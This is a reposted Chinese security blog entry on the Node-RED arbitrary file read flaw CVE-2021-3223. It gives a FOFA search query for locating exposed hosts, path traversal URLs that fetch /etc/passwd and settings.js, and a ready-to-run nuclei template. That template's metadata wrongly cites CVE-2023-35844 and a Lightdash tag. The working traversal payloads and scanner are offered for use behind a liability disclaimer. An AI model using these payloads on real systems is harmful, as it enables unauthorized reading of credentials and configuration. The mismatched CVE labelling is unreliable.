Node-RED任意文件读取漏洞 (CVE-2021-3223)

admin 2024年3月8日12:53:12评论18 views字数 855阅读2分51秒阅读模式

一、免责声明:

      本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!

二、产品介绍:

Node-RED任意文件读取漏洞 (CVE-2021-3223)

三、资产梳理:

fofa:title="Node-RED"

四、漏洞复现:

http://target/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Node-RED任意文件读取漏洞 (CVE-2021-3223)

http://target/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

Node-RED任意文件读取漏洞 (CVE-2021-3223)

五、POC:

nuclei:

id: node_red_filesReadinfo:  name: node_red_filesRead  author: joyboy  severity: critical  description: http://xxx.xxx.xxx/ui_base/js/..%2f..%2f..%2f..%2fsettings.js  metadata:    max-request: 1    fofa-query: title="Node-RED"    verified: true    CVE: CVE-2023-35844  tags: readfile,Lightdash,cve,cve2023requests:  - method: GET    path:      - "{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"    matchers-condition: and    matchers:      - type: status        status:          - 200      - type: word        words:          - 'root:'

Node-RED任意文件读取漏洞 (CVE-2021-3223)

原文始发于微信公众号(fly的渗透学习笔记):Node-RED任意文件读取漏洞 (CVE-2021-3223)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月8日12:53:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Node-RED任意文件读取漏洞 (CVE-2021-3223)http://cn-sec.com/archives/2558990.html

发表评论

匿名网友 填写信息